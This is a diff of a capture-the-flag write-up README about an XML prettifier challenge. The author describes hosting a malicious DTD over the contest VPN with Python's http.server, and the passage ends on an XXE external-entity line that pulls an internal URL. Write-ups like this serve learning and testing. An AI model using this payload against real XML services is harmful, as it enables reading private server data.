vernjan/ctf-writeups/write-ups/TheCatch2022/04-corporate-websites/02-xml-prettifier/README.md

 ## Solution: The VPN 🤦‍♂️

-After all I asked for a hint, and I was told to **use my computer to host the malicious DTD**!
+After all I asked a friend for a hint, and I was told to **use my computer to host the malicious DTD**!
 My machine is in VPN so the Prettifier server can access it.
 Of course!

 Then it was easy.
-I used Python `http.server` module to host my malicious DTD:
+I used Python [http.server](https://docs.python.org/3/library/http.server.html) module to host my malicious DTD:

 ```
 <!ENTITY % file SYSTEM "http://localhost:50000/notes">